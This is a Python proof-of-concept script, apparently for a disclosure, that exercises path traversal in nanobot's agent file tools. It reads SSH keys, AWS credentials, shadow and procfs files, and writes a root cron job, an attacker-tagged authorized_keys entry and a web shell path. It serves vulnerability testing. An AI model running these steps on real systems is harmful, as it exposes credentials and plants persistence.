#!/usr/bin/env python3
"""
POC: Path Traversal / Unrestricted File Access

This script demonstrates that the file system tools in nanobot allow
unrestricted file access because `base_dir` is never passed to
`_validate_path()`.

Affected code: nanobot/agent/tools/filesystem.py
- _validate_path() supports base_dir restriction but it's never used
- read_file, write_file, edit_file, list_dir all have unrestricted access
"""

import asyncio
import json
import os
import sys
import tempfile

# Add the directory three levels above this file to the import path so the
# `nanobot` package resolves when the script is run directly.  abspath()
# guards against a relative __file__, for which repeated dirname() calls
# would collapse to "" instead of walking up the tree.
sys.path.insert(
    0,
    os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))),
)

from nanobot.agent.tools.filesystem import (  # noqa: E402  (needs sys.path tweak above)
    ReadFileTool,
    WriteFileTool,
    EditFileTool,
    ListDirTool,
)


class PathTraversalPOC:
    """Demonstrates path traversal vulnerabilities.

    Each ``test_*`` coroutine runs one file-system tool against a path,
    records the outcome as a dict, appends it to ``self.results`` and
    returns it.  ``run_all_tests`` drives the full scenario list and prints
    a per-test report followed by a summary.
    """

    def __init__(self):
        self.read_tool = ReadFileTool()
        self.write_tool = WriteFileTool()
        # Instantiated for completeness; no test in this script exercises it.
        self.edit_tool = EditFileTool()
        self.list_tool = ListDirTool()
        self.results = []

    @staticmethod
    def _reported_error(output):
        """Return ``output`` if it looks like a tool-reported failure, else None.

        NOTE(review): assumes the nanobot tools signal failure by *returning*
        a string that starts with "Error" instead of raising -- confirm
        against nanobot/agent/tools/filesystem.py.  Without this check a
        missing or unreadable file would be counted as a successful access.
        """
        if isinstance(output, str) and output.startswith("Error"):
            return output
        return None

    async def test_read(self, name: str, path: str, expected_risk: str) -> dict:
        """Test reading a file outside workspace.

        Args:
            name: Short identifier stored in the result record.
            path: File path handed to the read tool.
            expected_risk: Human-readable description of the impact.

        Returns:
            The result record (also appended to ``self.results``).  On
            success ``content_preview`` holds up to the first 300 characters.
        """
        result = {
            "name": name,
            "operation": "read",
            "path": path,
            "expected_risk": expected_risk,
            "success": False,
            "content_preview": None,
            "error": None,
        }
        # Broad catch is deliberate: any tool failure is data for the report.
        try:
            content = await self.read_tool.execute(path=path)
            failure = self._reported_error(content)
            if failure is not None:
                result["error"] = failure
            else:
                result["success"] = True
                result["content_preview"] = content[:300] if content else None
        except Exception as e:
            result["error"] = str(e)

        self.results.append(result)
        return result

    async def test_write(self, name: str, path: str, content: str, expected_risk: str) -> dict:
        """Test writing a file outside workspace.

        Success is inferred from the tool's returned message containing
        "successfully", "written" or "created" (case-insensitive).

        Args:
            name: Short identifier stored in the result record.
            path: Destination path handed to the write tool.
            content: Text to write.
            expected_risk: Human-readable description of the impact.

        Returns:
            The result record (also appended to ``self.results``); the raw
            tool message is stored under ``output`` when no exception occurs.
        """
        result = {
            "name": name,
            "operation": "write",
            "path": path,
            "expected_risk": expected_risk,
            "success": False,
            "error": None,
        }
        try:
            output = await self.write_tool.execute(path=path, content=content)
            lowered = output.lower()
            result["success"] = any(
                marker in lowered for marker in ("successfully", "written", "created")
            )
            result["output"] = output
        except Exception as e:
            result["error"] = str(e)

        self.results.append(result)
        return result

    async def test_list(self, name: str, path: str, expected_risk: str) -> dict:
        """Test listing a directory outside workspace.

        Args:
            name: Short identifier stored in the result record.
            path: Directory path handed to the list tool.
            expected_risk: Human-readable description of the impact.

        Returns:
            The result record (also appended to ``self.results``).  On
            success ``entries`` holds up to the first 500 characters.
        """
        result = {
            "name": name,
            "operation": "list",
            "path": path,
            "expected_risk": expected_risk,
            "success": False,
            "entries": None,
            "error": None,
        }
        try:
            output = await self.list_tool.execute(path=path)
            failure = self._reported_error(output)
            if failure is not None:
                result["error"] = failure
            else:
                result["success"] = True
                result["entries"] = output[:500] if output else None
        except Exception as e:
            result["error"] = str(e)

        self.results.append(result)
        return result

    async def run_all_tests(self):
        """Run all path traversal tests.

        Prints a banner, runs the read, write and list scenarios in order
        (printing each result as it completes), prints the summary, and
        returns the accumulated list of result records.
        """
        print("=" * 60)
        print("PATH TRAVERSAL / UNRESTRICTED FILE ACCESS POC")
        print("=" * 60)
        print()

        # ==================== READ TESTS ====================
        print("--- READ OPERATIONS ---")
        print()

        # (banner, name, path, expected_risk)
        read_cases = [
            (
                "[TEST 1] Read /etc/passwd",
                "etc_passwd",
                "/etc/passwd",
                "System user enumeration",
            ),
            (
                # Should fail due to permissions, not restrictions.
                "[TEST 2] Read /etc/shadow (permission test)",
                "etc_shadow",
                "/etc/shadow",
                "Password hash disclosure (if readable)",
            ),
            (
                # Demonstrates path traversal outside workspace.
                "[TEST 3] Read /sensitive/api_keys.txt (test file outside workspace)",
                "sensitive_test_file",
                "/sensitive/api_keys.txt",
                "Sensitive file disclosure - if content contains 'PATH_TRAVERSAL_VULNERABILITY_CONFIRMED', vuln is proven",
            ),
            (
                "[TEST 4] Read SSH Private Key",
                "ssh_private_key",
                os.path.expanduser("~/.ssh/id_rsa"),
                "SSH private key disclosure",
            ),
            (
                "[TEST 5] Read Bash History",
                "bash_history",
                os.path.expanduser("~/.bash_history"),
                "Command history disclosure",
            ),
            (
                "[TEST 6] Read /proc/self/environ",
                "proc_environ",
                "/proc/self/environ",
                "Environment variable disclosure via procfs",
            ),
            (
                "[TEST 7] Path Traversal with ../",
                "dot_dot_traversal",
                "/app/../etc/passwd",
                "Path traversal using ../",
            ),
            (
                # Only meaningful if the credentials file exists.
                "[TEST 8] Read AWS Credentials",
                "aws_credentials",
                os.path.expanduser("~/.aws/credentials"),
                "Cloud credential disclosure",
            ),
        ]
        for banner, name, path, risk in read_cases:
            print(banner)
            r = await self.test_read(name, path, risk)
            self._print_result(r)

        # ==================== WRITE TESTS ====================
        print("--- WRITE OPERATIONS ---")
        print()

        ssh_dir = os.path.expanduser("~/.ssh")
        # (banner, name, path, content, expected_risk)
        write_cases = [
            (
                # Should succeed.
                "[TEST 9] Write to /tmp",
                "tmp_write",
                "/tmp/poc_traversal_test.txt",
                "POC: This file was written via path traversal vulnerability\nTimestamp: "
                + str(asyncio.get_running_loop().time()),
                "Arbitrary file write to system directories",
            ),
            (
                # Will fail due to permissions but shows intent.
                "[TEST 10] Write to /etc/cron.d (permission test)",
                "cron_write",
                "/etc/cron.d/poc_malicious",
                "* * * * * root /tmp/poc_payload.sh",
                "Cron job injection for persistence",
            ),
            (
                "[TEST 11] Write SSH Authorized Keys",
                "ssh_authkeys",
                f"{ssh_dir}/authorized_keys_poc_test",
                "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... attacker@evil.com",
                "SSH backdoor via authorized_keys",
            ),
            (
                "[TEST 12] Write to /var/www (if exists)",
                "www_write",
                "/var/www/html/poc_shell.php",
                "",
                "Web shell deployment",
            ),
            (
                "[TEST 13] Write to Application Directory",
                "app_overwrite",
                "/app/poc/results/poc_app_write.txt",
                "POC: Application file overwrite successful",
                "Application code/config tampering",
            ),
        ]
        for banner, name, path, content, risk in write_cases:
            print(banner)
            r = await self.test_write(name, path, content, risk)
            self._print_result(r)

        # ==================== LIST TESTS ====================
        print("--- LIST OPERATIONS ---")
        print()

        # (banner, name, path, expected_risk)
        list_cases = [
            ("[TEST 14] List / (root)", "list_root", "/", "File system enumeration"),
            ("[TEST 15] List /etc", "list_etc", "/etc", "Configuration enumeration"),
            (
                "[TEST 16] List Home Directory",
                "list_home",
                os.path.expanduser("~"),
                "User file enumeration",
            ),
            (
                "[TEST 17] List /proc",
                "list_proc",
                "/proc",
                "Process enumeration via procfs",
            ),
        ]
        for banner, name, path, risk in list_cases:
            print(banner)
            r = await self.test_list(name, path, risk)
            self._print_result(r)

        self._print_summary()
        return self.results

    def _print_result(self, result: dict):
        """Print a single test result.

        The status line is derived from ``success`` first, then from the
        error text ("permission" / "not found", case-insensitive).  Long
        fields are truncated for display only; the record is not modified.
        """
        error_text = (result.get("error") or "").lower()
        if result["success"]:
            status = "⚠️ SUCCESS (VULNERABLE)"
        elif "permission" in error_text:
            status = "🔒 PERMISSION DENIED (not a code issue)"
        elif "not found" in error_text:
            status = "📁 FILE NOT FOUND"
        else:
            status = "❌ FAILED"

        print(f" Status: {status}")
        print(f" Risk: {result['expected_risk']}")
        if result.get("content_preview"):
            # Escape newlines so the preview stays on one console line.
            preview = result["content_preview"][:150].replace('\n', '\\n')
            print(f" Content: {preview}...")
        if result.get("entries"):
            print(f" Entries: {result['entries'][:150]}...")
        if result.get("output"):
            print(f" Output: {result['output'][:100]}")
        if result.get("error"):
            print(f" Error: {result['error'][:100]}")
        print()

    def _print_summary(self):
        """Print test summary.

        Returns:
            A dict with per-operation success counts, the overall totals and
            a ``vulnerability_confirmed`` flag (true when any test succeeded).
        """
        print("=" * 60)
        print("SUMMARY")
        print("=" * 60)

        def count_successes(operation):
            return sum(
                1 for r in self.results if r["operation"] == operation and r["success"]
            )

        read_success = count_successes("read")
        write_success = count_successes("write")
        list_success = count_successes("list")
        total_success = read_success + write_success + list_success

        print(f"Read operations successful: {read_success}")
        print(f"Write operations successful: {write_success}")
        print(f"List operations successful: {list_success}")
        print(f"Total successful (vulnerable): {total_success}/{len(self.results)}")
        print()

        if total_success > 0:
            print("⚠️ VULNERABILITY CONFIRMED: Unrestricted file system access")
            print()
            print("Successful operations:")
            for r in self.results:
                if r["success"]:
                    print(f" - [{r['operation'].upper()}] {r['path']}")

        return {
            "read_success": read_success,
            "write_success": write_success,
            "list_success": list_success,
            "total_success": total_success,
            "total_tests": len(self.results),
            "vulnerability_confirmed": total_success > 0,
        }


async def main():
    """Run the POC and dump the per-test result records as JSON.

    Results go to /results/path_traversal_results.json when a /results
    directory exists, otherwise to path_traversal_results.json in the
    current working directory.
    """
    poc = PathTraversalPOC()
    results = await poc.run_all_tests()

    # Write results to file
    if os.path.isdir("/results"):
        results_path = "/results/path_traversal_results.json"
    else:
        results_path = "path_traversal_results.json"
    with open(results_path, "w", encoding="utf-8") as f:
        # default=str keeps the dump from failing on non-JSON-native values.
        json.dump(results, f, indent=2, default=str)
    print(f"\nResults written to: {results_path}")


if __name__ == "__main__":
    asyncio.run(main())